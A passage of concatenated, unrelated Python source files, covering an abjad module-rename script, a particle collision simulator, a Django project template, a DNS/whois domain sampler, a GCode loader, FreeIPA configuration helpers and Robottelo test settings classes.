old_tools_path = self._codebase_name_to_codebase_tools_path(
old_codebase)
new_tools_path = self._codebase_name_to_codebase_tools_path(
new_codebase)
old_module = old_module_name + '.py'
old_path = os.path.join(
old_tools_path, old_tools_package_name, old_module)
new_module = new_module_name + '.py'
new_path = os.path.join(
new_tools_path, new_tools_package_name, new_module)
command = 'git mv -f {} {}'.format(
old_path, new_path)
systemtools.IOManager.spawn_subprocess(command)
print('')
def _rename_old_test_files(self,
old_codebase,
old_tools_package_name,
old_module_name,
new_codebase,
new_tools_package_name,
new_module_name,
):
print('Renaming old test file(s) ...')
old_tools_path = self._codebase_name_to_codebase_tools_path(
old_codebase)
old_test_path = os.path.join(
old_tools_path, old_tools_package_name, 'test')
if not os.path.exists(old_test_path):
return
new_tools_path = self._codebase_name_to_codebase_tools_path(
new_codebase)
new_test_path = os.path.join(
new_tools_path, new_tools_package_name, 'test')
old_test_file_prefix = 'test_{}_{}'.format(
old_tools_package_name, old_module_name)
old_test_file_names = [x for x in os.listdir(old_test_path)
if x.startswith(old_test_file_prefix) and x.endswith('.py')]
for old_test_file_name in old_test_file_names:
old_test_file_path = os.path.join(
old_test_path, old_test_file_name)
old_test_file_suffix = old_test_file_name[
len(old_test_file_prefix):]
new_test_file_name = 'test_{}_{}{}'.format(
new_tools_package_name, new_module_name, old_test_file_suffix)
new_test_file_path = os.path.join(
new_test_path, new_test_file_name)
command = 'git mv -f {} {}'.format(
old_test_file_path, new_test_file_path)
systemtools.IOManager.spawn_subprocess(command)
print('')
def _update_codebase(self,
old_codebase,
old_tools_package_name,
old_module_name,
new_codebase,
new_tools_package_name,
new_module_name,
):
from abjad import abjad_configuration
without_dirs = ['--without-dirs', 'build', '--without-dirs', '_build']
directory = abjad_configuration.abjad_root_directory
print('Updating codebase ...')
print('')
old_text = '{}.{}'.format(old_tools_package_name, old_module_name)
new_text = '{}.{}'.format(new_tools_package_name, new_module_name)
command = [
directory,
old_text,
new_text,
'--force',
'--whole-words-only',
#'--verbose',
]
command.extend(without_dirs)
ReplaceInFilesScript()(command)
print('')
old_text = 'test_{}_{}_'.format(
old_tools_package_name, old_module_name)
new_text = 'test_{}_{}_'.format(
new_tools_package_name, new_module_name)
command = [directory, old_text, new_text, '--force', '--verbose']
command.extend(without_dirs)
ReplaceInFilesScript()(command)
print('')
old_text = old_module_name
new_text = new_module_name
command = [
directory,
old_text,
new_text,
'--force',
'--whole-words-only',
#'--verbose',
]
command.extend(without_dirs)
ReplaceInFilesScript()(command)
print('')
### PUBLIC METHODS ###
def process_args(self, args):
r'''Processes `args`.
Returns none.
'''
systemtools.IOManager.clear_terminal()
# Handle source path:
old_codebase, old_tools_package_name, old_module_name = \
self._parse_tools_package_path(args.source)
old_codebase_tools_path = self._codebase_name_to_codebase_tools_path(
old_codebase)
old_module_path = os.path.join(
old_codebase_tools_path,
old_tools_package_name,
old_module_name + '.py',
)
if not os.path.exists(old_module_path):
message = 'source does not exist: {}'
message = message.format(old_module_path)
raise SystemExit(message)
# Handle destination path:
new_codebase, new_tools_package_name, new_module_name = \
self._parse_tools_package_path(args.destination)
new_codebase_tools_path = self._codebase_name_to_codebase_tools_path(
new_codebase)
new_module_path = os.path.join(
new_codebase_tools_path,
new_tools_package_name,
new_module_name + '.py',
)
if os.path.exists(new_module_path):
message = 'destination already exists: {}'
message = message.format(old_module_path)
raise SystemExit(message)
# Process changes:
new_args = (
old_codebase, old_tools_package_name, old_module_name,
new_codebase, new_tools_package_name, new_module_name,
)
if not self._confirm_name_changes(*new_args):
raise SystemExit
self._rename_old_test_files(*new_args)
self._rename_old_api_page(*new_args)
self._rename_old_module(*new_args)
self._update_codebase(*new_args)
raise SystemExit
def setup_argument_parser(self, parser):
r'''Sets up argument `parser`.
Returns none.
'''
parser.add_argument(
'source',
help='toolspackage path of source module',
)
parser.add_argument(
'destination',
help='toolspackage path of destination module',
)
|
"""
Module defining the Event class which is used to manage collissions and check their validity
"""
from itertools import combinations
from copy import copy
from particle import Particle
class EventParticle(object):
def __init__(self, particle1, particle2):
self.particle1 = particle1
self.particle2 = particle2
self.id = (self.particle1.getCollisionCountAsCopy(), self.particle2.getCollisionCountAsCopy())
self.timeUntilCollision = self.particle1.collideParticle(self.particle2)
def isValid(self):
return self.id == (self.particle1.getCollisionCountAsCopy(), self.particle2.getCollisionCountAsCopy())
def reevaluateCollisionTime(self):
self.id = (self.particle1.getCollisionCountAsCopy(), self.particle2.getCollisionCountAsCopy())
self.timeUntilCollision = self.particle1.collideParticle(self.particle2)
def doCollision(self):
self.particle1.bounceParticle(self.particle2)
class EventWallX(object):
def __init__(self, particle):
self.particle = particle
self.id = self.particle.getCollisionCountAsCopy()
self.timeUntilCollision = self.particle.collidesWallX()
def isValid(self):
return self.id == self.particle.getCollisionCountAsCopy()
def reevaluateCollisionTime(self):
self.id = self.particle.getCollisionCountAsCopy()
self.timeUntilCollision = self.particle.collidesWallX()
def doCollision(self):
self.particle.bounceX()
class EventWallY(object):
def __init__(self, particle):
self.particle = particle
self.id = self.particle.getCollisionCountAsCopy()
self.timeUntilCollision = self.particle.collidesWallY()
def isValid(self):
return self.id == self.particle.getCollisionCountAsCopy()
def reevaluateCollisionTime(self):
self.id = self.particle.getCollisionCountAsCopy()
self.timeUntilCollision = self.particle.collidesWallY()
def doCollision(self):
self.particle.bounceY()
class EventManager(object):
def __init__(self, ListOfParticles):
self.ListOfParticles = ListOfParticles
self.ListOfEvents = []
for (particle1, particle2) in combinations(self.ListOfParticles, 2):
self.ListOfEvents.append(EventParticle(particle1, particle2))
for particle in self.ListOfParticles:
self.ListOfEvents.append(EventWallX(particle))
self.ListOfEvents.append(EventWallY(particle))
self.sortEventList()
def sortEventList(self):
def sorting_closure(event):
if event.timeUntilCollision is None or event.timeUntilCollision < 0.0:
return 1.0e7
else:
return event.timeUntilCollision
self.ListOfEvents = sorted(self.ListOfEvents, key=sorting_closure)
def step(self):
for event in self.ListOfEvents:
if not event.isValid():
event.reevaluateCollisionTime()
self.sortEventList()
collTime = copy(self.ListOfEvents[0].timeUntilCollision)
for particle in self.ListOfParticles:
particle.advance(collTime)
self.ListOfEvents[0].doCollision()
for event in self.ListOfEvents:
if event.timeUntilCollision is not None:
event.timeUntilCollision -= collTime
if __name__ == '__main__':
import numpy as np
import pylab as plt
a = Particle(np.array([0.1, 0.5]), np.array([0.01, 0.1]), 0.05, 2.0)
b = Particle(np.array([0.4, 0.5]), np.array([-0.1, 0.01]), 0.05, 2.0)
manager = EventManager([a,b])
for i in range(20):
plt.title(a.t)
plt.scatter([a._x[0], b._x[0]], [a._x[1], b._x[1]])
print a._x
print b._x
plt.xlim([0,1])
plt.ylim([0,1])
plt.show()
manager.step()
|
""" Projy template for PythonPackage. """
from datetime import date
from os import mkdir, rmdir
from shutil import move
from subprocess import call
from projy.templates.ProjyTemplate import ProjyTemplate
from projy.collectors.AuthorCollector import AuthorCollector
from projy.collectors.AuthorMailCollector import AuthorMailCollector
class DjangoProjectTemplate(ProjyTemplate):
""" Projy template class for PythonPackage. """
def __init__(self):
ProjyTemplate.__init__(self)
def directories(self):
""" Return the names of directories to be created. """
directories_description = [
self.project_name,
self.project_name + '/conf',
self.project_name + '/static',
]
return directories_description
def files(self):
""" Return the names of files to be created. """
files_description = [
# configuration
[ self.project_name,
'Makefile',
'DjangoMakefileTemplate' ],
[ self.project_name + '/conf',
'requirements_base.txt',
'DjangoRequirementsBaseTemplate' ],
[ self.project_name + '/conf',
'requirements_dev.txt',
'DjangoRequirementsDevTemplate' ],
[ self.project_name + '/conf',
'requirements_production.txt',
'DjangoRequirementsProdTemplate' ],
[ self.project_name + '/conf',
'nginx.conf',
'DjangoNginxConfTemplate' ],
[ self.project_name + '/conf',
'supervisord.conf',
'DjangoSupervisorConfTemplate' ],
[ self.project_name,
'fabfile.py',
'DjangoFabfileTemplate' ],
[ self.project_name,
'CHANGES.txt',
'PythonPackageCHANGESFileTemplate' ],
[ self.project_name,
'LICENSE.txt',
'GPL3FileTemplate' ],
[ self.project_name,
'README.txt',
'READMEReSTFileTemplate' ],
[ self.project_name,
'.gitignore',
'DjangoGitignoreTemplate' ],
# django files
[ self.project_name,
'dev.py',
'DjangoSettingsDevTemplate' ],
[ self.project_name,
'prod.py',
'DjangoSettingsProdTemplate' ],
]
return files_description
def substitutes(self):
""" Return the substitutions for the templating replacements. """
author_collector = AuthorCollector()
mail_collector = AuthorMailCollector()
substitute_dict = {
'project': self.project_name,
'project_lower': self.project_name.lower(),
'date': date.today().isoformat(),
'author': author_collector.collect(),
'author_email': mail_collector.collect(),
}
return substitute_dict
def posthook(self):
# build the virtualenv
call(['make'])
# create the Django project
call(['./venv/bin/django-admin.py', 'startproject', self.project_name])
# transform original settings files into 3 files for different env
mkdir('{p}/settings'.format(p=self.project_name))
self.touch('{p}/settings/__init__.py'.format(p=self.project_name))
move('dev.py', '{p}/settings'.format(p=self.project_name))
move('prod.py', '{p}/settings'.format(p=self.project_name))
move('{p}/{p}/settings.py'.format(p=self.project_name), '{p}/settings/base.py'.format(p=self.project_name))
# organize files nicely
mkdir('{p}/templates'.format(p=self.project_name))
move('{p}/manage.py'.format(p=self.project_name), 'manage.py')
move('{p}/{p}/__init__.py'.format(p=self.project_name), '{p}/'.format(p=self.project_name))
move('{p}/{p}/urls.py'.format(p=self.project_name), '{p}/'.format(p=self.project_name))
move('{p}/{p}/wsgi.py'.format(p=self.project_name), '{p}/'.format(p=self.project_name))
rmdir('{p}/{p}'.format(p=self.project_name))
# create empty git repo
call(['git', 'init'])
# replace some lines
self.replace_in_file('{p}/wsgi.py'.format(p=self.project_name),
'"{p}.settings"'.format(p=self.project_name),
'"{p}.settings.production"'.format(p=self.project_name))
self.replace_in_file('{p}/settings/base.py'.format(p=self.project_name),
u" # ('Your Name', 'your_email@example.com'),",
u" ('{}', '{}'),".format(self.substitutes()['author'],
self.substitutes()['author_email']))
|
import os
import sys
import random
import dns.resolver
numTestDomains = 100
numTopTLDs = 100
ignoreDomains = ['com', 'net', 'jobs', 'cat', 'mil', 'edu', 'gov', 'int', 'arpa']
serverZone = '.ws.sp.am' # DNS Zone containing CNAME records pointing to whois FQDNs
def dbg(s):
pass
random.seed()
zFiles = os.listdir('zonefiles/')
tlds = []
for zf in zFiles:
dbg(zf)
tld = {}
if zf.find(".txt") == -1:
dbg("This should not happen")
continue
zfh = open('zonefiles/' + zf, 'r')
lines = zfh.read().splitlines()
zfh.close()
dbg("after file read")
tld['name'] = lines[0].split(".")[0].strip()
if tld['name'] in ignoreDomains:
dbg("Ignoring:" + tld['name'])
continue
dbg("after name split")
rrs = []
for line in lines:
rr = line.split("\t")
rrs.append(rr)
dbg("after rr split")
ns = []
for rr in rrs:
if rr[3].lower() == 'ns':
ns.append(rr[0].split(".")[0])
dbg("after counting NS records")
if len(ns) < numTestDomains:
continue
else:
tld['size'] = len(ns)
tld['domains'] = random.sample(ns, numTestDomains)
for d in tld['domains']:
dbg(d + "." + tld['name'])
dbg(tld['name'] + ": " + str(tld['size']))
tlds.append(tld)
tlds.sort(key=lambda tld: tld['size'], reverse=True)
for ii in xrange(numTopTLDs):
# Find FQDN of whois server
d = dns.resolver.Resolver()
try:
resp = d.query(tlds[ii]['name'] + serverZone, 'CNAME')
if len(resp.rrset) < 1:
whois = 'UNKNOWN'
else:
whois = str(resp.rrset[0]).strip('.')
except:
whois = 'UNKNOWN'
s = whois + ','
for dom in tlds[ii]['domains']:
s += dom + '.' + tlds[ii]['name'] + ','
print s.strip(',')
|
from PyInstaller.utils.hooks import exec_statement
exec_statement("import wx.lib.activex")
|
from PySide import QtCore
from GCodeAnalyzer import GCodeAnalyzer
import sys
import pycnc_config
class GCodeLoader(QtCore.QThread):
load_finished = QtCore.Signal()
load_error = QtCore.Signal(object)
def __init__(self):
QtCore.QThread.__init__(self)
self.file = None
self.gcode = None
self.times = None
self.bBox = None
self.loaded = False
self.totalTime = 0
self.busy = False
self.g0_feed = pycnc_config.G0_FEED
def run(self):
self.loaded = False
self.gcode = []
self.times = []
self.bBox = None
self.totalTime = 0
self.busy = True
analyzer = GCodeAnalyzer()
analyzer.fastf = self.g0_feed
try:
with open(self.file) as f:
for line in f:
analyzer.Analyze(line)
self.gcode.append(line)
self.times.append(analyzer.getTravelTime()*60) # time returned is in minutes: convert to seconds
except:
self.busy = False
e = sys.exc_info()[0]
self.load_error.emit("%s" % e)
return
self.busy = False
self.loaded = True
self.totalTime = self.times[-1]
self.bBox = analyzer.getBoundingBox()
self.load_finished.emit()
def load(self, file):
self.file = file
self.start()
|
from __future__ import absolute_import
from optparse import (
Option, Values, OptionParser, IndentedHelpFormatter, OptionValueError)
from copy import copy
from configparser import SafeConfigParser
from urllib.parse import urlsplit
import socket
import functools
from dns.exception import DNSException
import dns.name
from ipaplatform.paths import paths
from ipapython.dn import DN
from ipapython.dnsutil import query_srv
from ipapython.ipautil import CheckedIPAddress, CheckedIPAddressLoopback
class IPAConfigError(Exception):
def __init__(self, msg=''):
self.msg = msg
Exception.__init__(self, msg)
def __repr__(self):
return self.msg
__str__ = __repr__
class IPAFormatter(IndentedHelpFormatter):
"""Our own optparse formatter that indents multiple lined usage string."""
def format_usage(self, usage):
usage_string = "Usage:"
spacing = " " * len(usage_string)
lines = usage.split("\n")
ret = "%s %s\n" % (usage_string, lines[0])
for line in lines[1:]:
ret += "%s %s\n" % (spacing, line)
return ret
def check_ip_option(option, opt, value, allow_loopback=False):
try:
if allow_loopback:
return CheckedIPAddressLoopback(value)
else:
return CheckedIPAddress(value)
except Exception as e:
raise OptionValueError("option {}: invalid IP address {}: {}"
.format(opt, value, e))
def check_dn_option(option, opt, value):
try:
return DN(value)
except Exception as e:
raise OptionValueError("option %s: invalid DN: %s" % (opt, e))
def check_constructor(option, opt, value):
con = option.constructor
assert con is not None, "Oops! Developer forgot to set 'constructor' kwarg"
try:
return con(value)
except Exception as e:
raise OptionValueError("option {} invalid: {}".format(opt, e))
class IPAOption(Option):
"""
optparse.Option subclass with support of options labeled as
security-sensitive such as passwords.
"""
ATTRS = Option.ATTRS + ["sensitive", "constructor"]
TYPES = Option.TYPES + ("ip", "dn", "constructor", "ip_with_loopback")
TYPE_CHECKER = copy(Option.TYPE_CHECKER)
TYPE_CHECKER["ip"] = check_ip_option
TYPE_CHECKER["ip_with_loopback"] = functools.partial(check_ip_option,
allow_loopback=True)
TYPE_CHECKER["dn"] = check_dn_option
TYPE_CHECKER["constructor"] = check_constructor
class IPAOptionParser(OptionParser):
"""
optparse.OptionParser subclass that uses IPAOption by default
for storing options.
"""
def __init__(self,
usage=None,
option_list=None,
option_class=IPAOption,
version=None,
conflict_handler="error",
description=None,
formatter=None,
add_help_option=True,
prog=None):
OptionParser.__init__(self, usage, option_list, option_class,
version, conflict_handler, description,
formatter, add_help_option, prog)
def get_safe_opts(self, opts):
"""
Returns all options except those with sensitive=True in the same
fashion as parse_args would
"""
all_opts_dict = {
o.dest: o for o in self._get_all_options()
if hasattr(o, 'sensitive')
}
safe_opts_dict = {}
for option, value in opts.__dict__.items():
if not all_opts_dict[option].sensitive:
safe_opts_dict[option] = value
return Values(safe_opts_dict)
def verify_args(parser, args, needed_args = None):
"""Verify that we have all positional arguments we need, if not, exit."""
if needed_args:
needed_list = needed_args.split(" ")
else:
needed_list = []
len_need = len(needed_list)
len_have = len(args)
if len_have > len_need:
parser.error("too many arguments")
elif len_have < len_need:
parser.error("no %s specified" % needed_list[len_have])
class IPAConfig:
def __init__(self):
self.default_realm = None
self.default_server = []
self.default_domain = None
def get_realm(self):
if self.default_realm:
return self.default_realm
else:
raise IPAConfigError("no default realm")
def get_server(self):
if len(self.default_server):
return self.default_server
else:
raise IPAConfigError("no default server")
def get_domain(self):
if self.default_domain:
return self.default_domain
else:
raise IPAConfigError("no default domain")
config = IPAConfig()
def __parse_config(discover_server = True):
p = SafeConfigParser()
p.read(paths.IPA_DEFAULT_CONF)
try:
if not config.default_realm:
config.default_realm = p.get("global", "realm")
except Exception:
pass
if discover_server:
try:
s = p.get("global", "xmlrpc_uri")
server = urlsplit(s)
config.default_server.append(server.netloc)
except Exception:
pass
try:
if not config.default_domain:
config.default_domain = p.get("global", "domain")
except Exception:
pass
def __discover_config(discover_server = True):
servers = []
try:
if not config.default_domain:
# try once with REALM -> domain
domain = str(config.default_realm).lower()
name = "_ldap._tcp." + domain
try:
servers = query_srv(name)
except DNSException:
# try cycling on domain components of FQDN
try:
domain = dns.name.from_text(socket.getfqdn())
except DNSException:
return False
while True:
domain = domain.parent()
if str(domain) == '.':
return False
name = "_ldap._tcp.%s" % domain
try:
servers = query_srv(name)
break
except DNSException:
pass
config.default_domain = str(domain).rstrip(".")
if discover_server:
if not servers:
name = "_ldap._tcp.%s." % config.default_domain
try:
servers = query_srv(name)
except DNSException:
pass
for server in servers:
hostname = str(server.target).rstrip(".")
config.default_server.append(hostname)
except Exception:
pass
return None
def add_standard_options(parser):
parser.add_option("--realm", dest="realm", help="Override default IPA realm")
parser.add_option("--server", dest="server",
help="Override default FQDN of IPA server")
parser.add_option("--domain", dest="domain", help="Override default IPA DNS domain")
def init_config(options=None):
if options:
config.default_realm = options.realm
config.default_domain = options.domain
if options.server:
config.default_server.extend(options.server.split(","))
if len(config.default_server):
discover_server = False
else:
discover_server = True
__parse_config(discover_server)
__discover_config(discover_server)
# make sure the server list only contains unique items
new_server = []
for server in config.default_server:
if server not in new_server:
new_server.append(server)
config.default_server = new_server
if not config.default_realm:
raise IPAConfigError("IPA realm not found in DNS, in the config file (/etc/ipa/default.conf) or on the command line.")
if not config.default_server:
raise IPAConfigError("IPA server not found in DNS, in the config file (/etc/ipa/default.conf) or on the command line.")
if not config.default_domain:
raise IPAConfigError("IPA domain not found in the config file (/etc/ipa/default.conf) or on the command line.")
|
"""Define and instantiate the configuration class for Robottelo."""
import logging
import os
import sys
from logging import config
from nailgun import entities, entity_mixins
from nailgun.config import ServerConfig
from robottelo.config import casts
from six.moves.urllib.parse import urlunsplit, urljoin
from six.moves.configparser import (
NoOptionError,
NoSectionError,
ConfigParser
)
LOGGER = logging.getLogger(__name__)
SETTINGS_FILE_NAME = 'robottelo.properties'
class ImproperlyConfigured(Exception):
"""Indicates that Robottelo somehow is improperly configured.
For example, if settings file can not be found or some required
configuration is not defined.
"""
def get_project_root():
"""Return the path to the Robottelo project root directory.
:return: A directory path.
:rtype: str
"""
return os.path.realpath(os.path.join(
os.path.dirname(__file__),
os.pardir,
os.pardir,
))
class INIReader(object):
"""ConfigParser wrapper able to cast value when reading INI options."""
# Helper casters
cast_boolean = casts.Boolean()
cast_dict = casts.Dict()
cast_list = casts.List()
cast_logging_level = casts.LoggingLevel()
cast_tuple = casts.Tuple()
cast_webdriver_desired_capabilities = casts.WebdriverDesiredCapabilities()
def __init__(self, path):
self.config_parser = ConfigParser()
with open(path) as handler:
self.config_parser.readfp(handler)
if sys.version_info[0] < 3:
# ConfigParser.readfp is deprecated on Python3, read_file
# replaces it
self.config_parser.readfp(handler)
else:
self.config_parser.read_file(handler)
def get(self, section, option, default=None, cast=None):
"""Read an option from a section of a INI file.
The default value will return if the look up option is not available.
The value will be cast using a callable if specified otherwise a string
will be returned.
:param section: Section to look for.
:param option: Option to look for.
:param default: The value that should be used if the option is not
defined.
:param cast: If provided the value will be cast using the cast
provided.
"""
try:
value = self.config_parser.get(section, option)
if cast is not None:
if cast is bool:
value = self.cast_boolean(value)
elif cast is dict:
value = self.cast_dict(value)
elif cast is list:
value = self.cast_list(value)
elif cast is tuple:
value = self.cast_tuple(value)
else:
value = cast(value)
except (NoSectionError, NoOptionError):
value = default
return value
def has_section(self, section):
"""Check if section is available."""
return self.config_parser.has_section(section)
class FeatureSettings(object):
"""Settings related to a feature.
Create a instance of this class and assign attributes to map to the feature
options.
"""
def read(self, reader):
"""Subclasses must implement this method in order to populate itself
with expected settings values.
:param reader: An INIReader instance to read the settings.
"""
raise NotImplementedError('Subclasses must implement read method.')
def validate(self):
"""Subclasses must implement this method in order to validade the
settings and raise ``ImproperlyConfigured`` if any issue is found.
"""
raise NotImplementedError('Subclasses must implement validate method.')
class ServerSettings(FeatureSettings):
"""Satellite server settings definitions."""
def __init__(self, *args, **kwargs):
super(ServerSettings, self).__init__(*args, **kwargs)
self.admin_password = None
self.admin_username = None
self.hostname = None
self.port = None
self.scheme = None
self.ssh_key = None
self.ssh_password = None
self.ssh_username = None
def read(self, reader):
"""Read and validate Satellite server settings."""
self.admin_password = reader.get(
'server', 'admin_password', 'changeme')
self.admin_username = reader.get(
'server', 'admin_username', 'admin')
self.hostname = reader.get('server', 'hostname')
self.port = reader.get('server', 'port', cast=int)
self.scheme = reader.get('server', 'scheme', 'https')
self.ssh_key = reader.get('server', 'ssh_key')
self.ssh_password = reader.get('server', 'ssh_password')
self.ssh_username = reader.get('server', 'ssh_username', 'root')
def validate(self):
validation_errors = []
if self.hostname is None:
validation_errors.append('[server] hostname must be provided.')
if (self.ssh_key is None and self.ssh_password is None):
validation_errors.append(
'[server] ssh_key or ssh_password must be provided.')
return validation_errors
def get_credentials(self):
"""Return credentials for interacting with a Foreman deployment API.
:return: A username-password pair.
:rtype: tuple
"""
return (self.admin_username, self.admin_password)
def get_url(self):
"""Return the base URL of the Foreman deployment being tested.
The following values from the config file are used to build the URL:
* ``[server] scheme`` (default: https)
* ``[server] hostname`` (required)
* ``[server] port`` (default: none)
Setting ``port`` to 80 does *not* imply that ``scheme`` is 'https'. If
``port`` is 80 and ``scheme`` is unset, ``scheme`` will still default
to 'https'.
:return: A URL.
:rtype: str
"""
if not self.scheme:
scheme = 'https'
else:
scheme = self.scheme
# All anticipated error cases have been handled at this point.
if not self.port:
return urlunsplit((scheme, self.hostname, '', '', ''))
else:
return urlunsplit((
scheme, '{0}:{1}'.format(self.hostname, self.port), '', '', ''
))
def get_pub_url(self):
"""Return the pub URL of the server being tested.
The following values from the config file are used to build the URL:
* ``main.server.hostname`` (required)
:return: The pub directory URL.
:rtype: str
"""
return urlunsplit(('http', self.hostname, 'pub/', '', ''))
def get_cert_rpm_url(self):
"""Return the Katello cert RPM URL of the server being tested.
The following values from the config file are used to build the URL:
* ``main.server.hostname`` (required)
:return: The Katello cert RPM URL.
:rtype: str
"""
return urljoin(
self.get_pub_url(), 'katello-ca-consumer-latest.noarch.rpm')
class ClientsSettings(FeatureSettings):
"""Clients settings definitions."""
def __init__(self, *args, **kwargs):
super(ClientsSettings, self).__init__(*args, **kwargs)
self.image_dir = None
self.provisioning_server = None
def read(self, reader):
"""Read clients settings."""
self.image_dir = reader.get(
'clients', 'image_dir', '/opt/robottelo/images')
self.provisioning_server = reader.get(
'clients', 'provisioning_server')
def validate(self):
"""Validate clients settings."""
validation_errors = []
if self.provisioning_server is None:
validation_errors.append(
'[clients] provisioning_server option must be provided.')
return validation_errors
class DockerSettings(FeatureSettings):
"""Docker settings definitions."""
def __init__(self, *args, **kwargs):
super(DockerSettings, self).__init__(*args, **kwargs)
self.unix_socket = None
self.external_url = None
self.external_registry_1 = None
self.external_registry_2 = None
def read(self, reader):
"""Read docker settings."""
self.unix_socket = reader.get(
'docker', 'unix_socket', False, bool)
self.external_url = reader.get('docker', 'external_url')
self.external_registry_1 = reader.get('docker', 'external_registry_1')
self.external_registry_2 = reader.get('docker', 'external_registry_2')
def validate(self):
"""Validate docker settings."""
validation_errors = []
if not any((self.unix_socket, self.external_url)):
validation_errors.append(
'Either [docker] unix_socket or external_url options must '
'be provided or enabled.')
if not all((self.external_registry_1, self.external_registry_2)):
validation_errors.append(
'Both [docker] external_registry_1 and external_registry_2 '
'options must be provided.')
return validation_errors
def get_unix_socket_url(self):
"""Use the unix socket connection to the local docker daemon. Make sure
that your Satellite server's docker is configured to allow foreman user
accessing it. This can be done by::
$ groupadd docker
$ usermod -aG docker foreman
# Add -G docker to the options for the docker daemon
$ systemctl restart docker
$ katello-service restart
"""
return (
'unix:///var/run/docker.sock'
if self.unix_socket else None
)
class FakeManifestSettings(FeatureSettings):
"""Fake manifest settings defintitions."""
def __init__(self, *args, **kwargs):
super(FakeManifestSettings, self).__init__(*args, **kwargs)
self.cert_url = None
self.key_url = None
self.url = None
def read(self, reader):
"""Read fake manifest settings."""
self.cert_url = reader.get(
'fake_manifest', 'cert_url')
self.key_url = reader.get(
'fake_manifest', 'key_url')
self.url = reader.get(
'fake_manifest', 'url')
def validate(self):
"""Validate fake manifest settings."""
validation_errors = []
if not all(vars(self).values()):
validation_errors.append(
'All [fake_manifest] cert_url, key_url, url options must '
'be provided.'
)
return validation_errors
class LDAPSettings(FeatureSettings):
"""LDAP settings definitions."""
def __init__(self, *args, **kwargs):
super(LDAPSettings, self).__init__(*args, **kwargs)
self.basedn = None
self.grpbasedn = None
self.hostname = None
self.password = None
self.username = None
def read(self, reader):
"""Read LDAP settings."""
self.basedn = reader.get('ldap', 'basedn')
self.grpbasedn = reader.get('ldap', 'grpbasedn')
self.hostname = reader.get('ldap', 'hostname')
self.password = reader.get('ldap', 'password')
self.username = reader.get('ldap', 'username')
def validate(self):
"""Validate LDAP settings."""
validation_errors = []
if not all(vars(self).values()):
validation_errors.append(
'All [ldap] basedn, grpbasedn, hostname, password, '
'username options must be provided.'
)
return validation_errors
class LibvirtHostSettings(FeatureSettings):
"""Libvirt host settings definitions."""
def __init__(self, *args, **kwargs):
super(LibvirtHostSettings, self).__init__(*args, **kwargs)
self.libvirt_image_dir = None
self.libvirt_hostname = None
def read(self, reader):
"""Read libvirt host settings."""
self.libvirt_image_dir = reader.get(
'compute_resources', 'libvirt_image_dir', '/var/lib/libvirt/images'
)
self.libvirt_hostname = reader.get(
'compute_resources', 'libvirt_hostname')
def validate(self):
"""Validate libvirt host settings."""
validation_errors = []
if self.libvirt_hostname is None:
validation_errors.append(
'[compute_resources] libvirt_hostname option must be provided.'
)
return validation_errors
class FakeCapsuleSettings(FeatureSettings):
"""Fake Capsule settings definitions."""
def __init__(self, *args, **kwargs):
super(FakeCapsuleSettings, self).__init__(*args, **kwargs)
self.port_range = None
def read(self, reader):
"""Read fake capsule settings"""
self.port_range = reader.get(
'fake_capsules', 'port_range', cast=tuple
)
def validate(self):
"""Validate fake capsule settings."""
validation_errors = []
if self.port_range is None:
validation_errors.append(
'[fake_capsules] port_range option must be provided.'
)
return validation_errors
class RHEVSettings(FeatureSettings):
"""RHEV settings definitions."""
def __init__(self, *args, **kwargs):
super(RHEVSettings, self).__init__(*args, **kwargs)
# Compute Resource Information
self.hostname = None
self.username = None
self.password = None
self.datacenter = None
self.vm_name = None
# Image Information
self.image_os = None
self.image_arch = None
self.image_username = None
self.image_password = None
self.image_name = None
def read(self, reader):
"""Read rhev settings."""
# Compute Resource Information
self.hostname = reader.get('rhev', 'hostname')
self.username = reader.get('rhev', 'username')
self.password = reader.get('rhev', 'password')
self.datacenter = reader.get('rhev', 'datacenter')
self.vm_name = reader.get('rhev', 'vm_name')
# Image Information
self.image_os = reader.get('rhev', 'image_os')
self.image_arch = reader.get('rhev', 'image_arch')
self.image_username = reader.get('rhev', 'image_username')
self.image_password = reader.get('rhev', 'image_password')
self.image_name = reader.get('rhev', 'image_name')
def validate(self):
"""Validate rhev settings."""
validation_errors = []
if not all(vars(self).values()):
validation_errors.append(
'All [rhev] hostname, username, password, datacenter, '
'vm_name, image_name, image_os, image_arch, image_usernam, '
'image_name options must be provided.'
)
return validation_errors
class VmWareSettings(FeatureSettings):
"""VmWare settings definitions."""
def __init__(self, *args, **kwargs):
super(VmWareSettings, self).__init__(*args, **kwargs)
# Compute Resource Information
self.vcenter = None
self.username = None
self.password = None
self.datacenter = None
self.vm_name = None
# Image Information
self.image_os = None
self.image_arch = None
self.image_username = None
self.image_password = None
self.image_name = None
def read(self, reader):
"""Read vmware settings."""
# Compute Resource Information
self.vcenter = reader.get('vmware', 'hostname')
self.username = reader.get('vmware', 'username')
self.password = reader.get('vmware', 'password')
self.datacenter = reader.get('vmware', 'datacenter')
self.vm_name = reader.get('vmware', 'vm_name')
# Image Information
self.image_os = reader.get('vmware', 'image_os')
self.image_arch = reader.get('vmware', 'image_arch')
self.image_username = reader.get('vmware', 'image_username')
self.image_password = reader.get('vmware', 'image_password')
self.image_name = reader.get('vmware', 'image_name')
def validate(self):
"""Validate vmware settings."""
validation_errors = []
if not all(vars(self).values()):
validation_errors.append(
'All [vmware] hostname, username, password, datacenter, '
'vm_name, image_name, image_os, image_arch, image_usernam, '
'image_name options must be provided.'
)
return validation_errors
class DiscoveryISOSettings(FeatureSettings):
"""Discovery ISO name settings definition."""
def __init__(self, *args, **kwargs):
super(DiscoveryISOSettings, self).__init__(*args, **kwargs)
self.discovery_iso = None
def read(self, reader):
"""Read discovery iso setting."""
self.discovery_iso = reader.get('discovery', 'discovery_iso')
def validate(self):
"""Validate discovery iso name setting."""
validation_errors = []
if self.discovery_iso is None:
validation_errors.append(
'[discovery] discovery iso name must be provided.'
)
return validation_errors
class OscapSettings(FeatureSettings):
"""Oscap settings definitions."""
def __init__(self, *args, **kwargs):
super(OscapSettings, self).__init__(*args, **kwargs)
self.content_path = None
def read(self, reader):
"""Read Oscap settings."""
self.content_path = reader.get('oscap', 'content_path')
def validate(self):
"""Validate Oscap settings."""
validation_errors = []
if self.content_path is None:
validation_errors.append(
'[oscap] content_path option must be provided.'
)
return validation_errors
class PerformanceSettings(FeatureSettings):
"""Performance settings definitions."""
def __init__(self, *args, **kwargs):
super(PerformanceSettings, self).__init__(*args, **kwargs)
self.time_hammer = None
self.cdn_address = None
self.virtual_machines = None
self.fresh_install_savepoint = None
self.enabled_repos_savepoint = None
self.csv_buckets_count = None
self.sync_count = None
self.sync_type = None
self.repos = None
def read(self, reader):
"""Read performance settings."""
self.time_hammer = reader.get(
